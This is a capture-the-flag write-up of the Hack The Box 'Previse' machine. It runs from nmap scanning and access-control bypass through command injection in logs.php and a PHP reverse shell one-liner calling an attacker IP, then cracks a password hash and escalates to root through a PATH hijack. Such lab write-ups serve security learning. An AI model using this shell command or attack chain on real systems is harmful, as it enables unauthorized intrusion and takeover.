Hello everyone , in this post I will be sharing my writeup for HTB-Previse machine which was a easy difficulty linux machine ,starting off with the nmap we can only see 2 ports , from which port 80 had a web page which had a login page , trying sqli to bypasss login it didn’t work however when running a fuzzing tool we saw some php files that we can actually see the response without being authenticated which revealed how to register a user , after creating an account we can download an archive file which revealed the source code of web pages out of which config.php had msql credentials and logs.php was vulnerable command injection which gave us a reverse shell as www-data , cracking the hash from database escalated us to m4lwhere and this user can run a script which had gzip and date being used with relative path which lead us to PATH variable exploit and escalating our privileges to root user.
NMAP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA) NTE5AAAAIICTOv+Redwjirw6cPpkc/d3Fzz4iRB3lCRfZpZ7irps
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-favicon: Unknown favicon MD5: B21DD667DF8D81CAE6DD1374DD548004
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPORT 80 (HTTP)
On the webserver we can see a php login page
I tried the basic password admin:admin , it didn't worked , moved on to trying manual sqli by pass admin' or 1=1 -- that didn't worked either. Ran sqlmap but it didn't find any sqli
So I ran gobuster to fuzz for files
We can see some pages being redirected to login.php again but we can see the response of the pages if we can capture it through burpsuite
Looking at the html response we can see , without logging we can view some php pages which have html in it so now we don’t really need to use burpsuite to view responses , we can use crul
We can see , an account can be made with accounts.php
Now to create a user , we need to make a POST request to accounts.php with username , password and confirm parameter also to note that username and password must be between 5 to 32 characters long
curl -X POST -d "username=arz101&password=123456789&confirm=123456789" http://10.10.11.104/accounts
.phpNow we can login to the site
On navigating to Files we can see a backup archive that we can download
Extracting the archive we can see some php files out of config.php and logs.php are interesting ones to look, from config.php we can find the mysql credentials
From logs.php it seems that we can inject some commands as it's not properly sanitized
We can see the delim parameter can be set to comma, space and tab
This is allowing us to make request to our machine which means we can request to get phpbash file which is an interactive web shell on browser and we can then get a reverse shell from that
Now just copy and paste this php reverse shell code
php -r '$sock=fsockopen("10.10.14.45",2222);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'Stabilizng the shell with python
Using the mysql creds we found earlier
We see a user’s hash (m4lwhere) for the rest they are like the way I made an account as this is an shared instance so we need to crack m4lwhere 's password hash . Cracking this hash could take long , for me it took 11 minutes to crack.
Now that we got the user password we can login through ssh
Doing sudo -l we can see that this user can run the script which is /opt/scripts as root
Looking at the script we can see it’s using gzip without it's absolute binary path i.e /bin/gzip and also same with data binary
So we can abuse this through PATH variable exploit where we would create a fake binary having spawning a bash shell ,a reverse shell or making bash a SUID and then adding the path to that binary in PATH variable. We can do for both gzip and date but here I'll be showing with date binary
And boom we got root
